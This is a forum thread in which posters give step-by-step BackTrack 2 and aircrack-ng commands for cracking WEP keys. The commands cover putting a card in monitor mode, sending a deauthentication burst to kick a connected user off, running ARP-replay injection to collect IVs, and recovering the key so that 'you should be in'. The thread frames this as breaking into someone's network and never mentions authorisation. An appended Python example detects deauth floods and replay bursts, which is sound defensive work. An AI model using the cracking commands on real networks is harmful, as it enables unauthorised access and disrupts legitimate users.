
BackTrack 2 wep key cracking


ghost's Avatar

I have got BackTrack 2 and I was confused on either the syntax of the commands themselves or if I just didn't configure everything correctly. So to help others, here is what I have. I run iwconfig and set the wireless card to listen (iwconfig wlan0 mode monitor). Next I need to run kismet (when I run kismet it tells me I need to configure it! and to refer to the .doc; I did not know how or where it was, but that's ok, there is an alternative, airodump). So I get it all set up (airodump wlan0 dump channel 1)

-new window- Now I need to inject the packets so I can increase the IVs rapidly. So I run (aireplay -0 10 -1 "mac address of AP" -c "client mac address" wlan0) {this was to kick the other user off of the AP and re-authenticate}

-new window- Now to the injection (aireplay -3 -b "mac address of AP" -h "client mac address" -x 500 wlan0)

Now the numbers should increase; after a while, 500,000 IVs or so later, it's time to crack them.

-new window- (aircrack -a 1 -b "mac address of AP" dump.ivs) This tells aircrack that it should be trying to break the key. Here is another method to use that is sometimes faster: (aircrack -a 1 -i 1 -n 64 -m "mac address of client" -b "mac address of AP" dump.ivs)

And now you should get a WEP key. Jot it down on a piece of paper, reboot to Windows and enter the key twice without the ":" and now you should be in!

(If anyone sees anything I need to add, or if there is an error, please let me know or edit it, thx Exidous) PS: I need a sig


ghost's Avatar

For you to use kismet on BackTrack you have to edit kismet's conf: sudo kedit /usr/local/etc/kismet.conf

Find the line source=none,none,none, which is source=drivername,devicename,namegiven. For example, mine is (because I use the patched ipwraw drivers): source=ipw3945,wifi0,Intel

Others, for example, are: source=ipw3945,eth1,intel or source=orinoco,eth1,kismet etc.

then kismet will run, and run happy. Lucky you having a card and drivers that inject and enter monitor mode nicely. Few are so fortunate.


ghost's Avatar

hmm..

I've never had to get 500K IVs to crack a WEP, usually just 50K; I usually go about it kinda like this:

airmon-ng start rausb0

airodump-ng rausb0

I find the target AP, and a client that is on, then I use the client's MAC address in an ARP attack.

Then I restart airodump to capture the packets I want:

airodump-ng --channel 6 -w dumpfile rausb0

Then I start the ARP attack:

aireplay-ng -3 -b <AP MAC> -h <AP Client's MAC> rausb0

I wait to 50K IVs, then I crack it in less than a few seconds..
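Both the first and the last post lean on the same two steps: a deauthentication burst to force a client to re-associate, and an ARP replay that pumps thousands of identical-length data frames through the AP to drive the IV count up. Each of those leaves a distinctive footprint on the air, which is what a wireless IDS looks for. The following is an added example (not code from this thread or from the aircrack-ng project) showing how a defender can flag both patterns over parsed 802.11 frame records. The Frame dataclass, the function names, the window size and the two thresholds are all assumptions, and the capture it runs on is constructed inline; real input would come from a monitor-mode capture parsed into the same fields.

```python
"""Flag deauth floods and ARP-replay-style bursts in parsed 802.11 frame records.

Added example for this thread; Frame, the function names and the thresholds
are assumptions, and build_sample_frames() fabricates the input.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Frame:
    ts: float      # capture time in seconds (constructed field layout)
    kind: str      # coarse classification: "deauth", "data" or "beacon"
    src: str       # transmitter address
    dst: str       # receiver address
    length: int    # frame length in bytes


WINDOW_SECONDS = 10.0     # sliding window length (assumed tuning value)
DEAUTH_THRESHOLD = 10     # deauths from one source per window (assumed)
REPLAY_THRESHOLD = 200    # same-length data frames from one source per window (assumed)


def _max_in_window(timestamps, window):
    """Largest number of events that fall inside any span of `window` seconds."""
    ts = sorted(timestamps)
    best, lo = 0, 0
    for hi in range(len(ts)):
        while ts[hi] - ts[lo] > window:
            lo += 1
        best = max(best, hi - lo + 1)
    return best


def find_deauth_floods(frames, window=WINDOW_SECONDS, threshold=DEAUTH_THRESHOLD):
    """Return {src: peak_count} for sources whose deauth rate reaches the threshold.

    A legitimate AP sends the odd deauth; a tool forcing re-association sends
    them in a tight burst, so the per-window peak is the useful signal.
    """
    by_src = defaultdict(list)
    for f in frames:
        if f.kind == "deauth":
            by_src[f.src].append(f.ts)
    hits = {}
    for src, ts in by_src.items():
        peak = _max_in_window(ts, window)
        if peak >= threshold:
            hits[src] = peak
    return hits


def find_replay_bursts(frames, window=WINDOW_SECONDS, threshold=REPLAY_THRESHOLD):
    """Return {(src, length): peak_count} for identical-length data-frame bursts.

    ARP replay re-injects one captured ARP request over and over, so the AP
    sees a flood of data frames of exactly the same size from one address,
    unlike normal traffic whose frame lengths vary.
    """
    by_key = defaultdict(list)
    for f in frames:
        if f.kind == "data":
            by_key[(f.src, f.length)].append(f.ts)
    hits = {}
    for key, ts in by_key.items():
        peak = _max_in_window(ts, window)
        if peak >= threshold:
            hits[key] = peak
    return hits


def build_sample_frames():
    """Constructed capture: normal traffic plus one deauth burst and one replay burst."""
    ap = "02:00:00:00:00:01"         # placeholder AP address
    client = "02:00:00:00:00:02"     # placeholder legitimate client
    injector = "02:00:00:00:00:03"   # placeholder address sending the deauths
    frames = []
    # Background: a beacon every 0.1 s and client data of varying length.
    for i in range(100):
        frames.append(Frame(i * 0.1, "beacon", ap, "ff:ff:ff:ff:ff:ff", 120))
        frames.append(Frame(i * 0.1 + 0.05, "data", client, ap, 100 + (i % 7) * 30))
    # Deauth burst: 12 frames in under two seconds aimed at the client.
    for i in range(12):
        frames.append(Frame(2.0 + i * 0.15, "deauth", injector, client, 26))
    # Replay burst: 300 data frames of identical length (68 bytes) in about 3 s,
    # carrying the client's own address, as a replayed ARP request would.
    for i in range(300):
        frames.append(Frame(4.0 + i * 0.01, "data", client, ap, 68))
    return frames


if __name__ == "__main__":
    sample = build_sample_frames()
    print("deauth floods:", find_deauth_floods(sample))
    print("replay bursts:", find_replay_bursts(sample))
```

The thresholds are deliberately conservative placeholders: on a busy network a per-window peak of ten deauths from one address, or a couple of hundred same-sized data frames from one client, is far outside normal behaviour, but they should be tuned against a baseline of the network's own traffic before alerting on them. A sliding-window peak is used rather than a per-minute total so a short, sharp burst is not diluted by quiet periods around it.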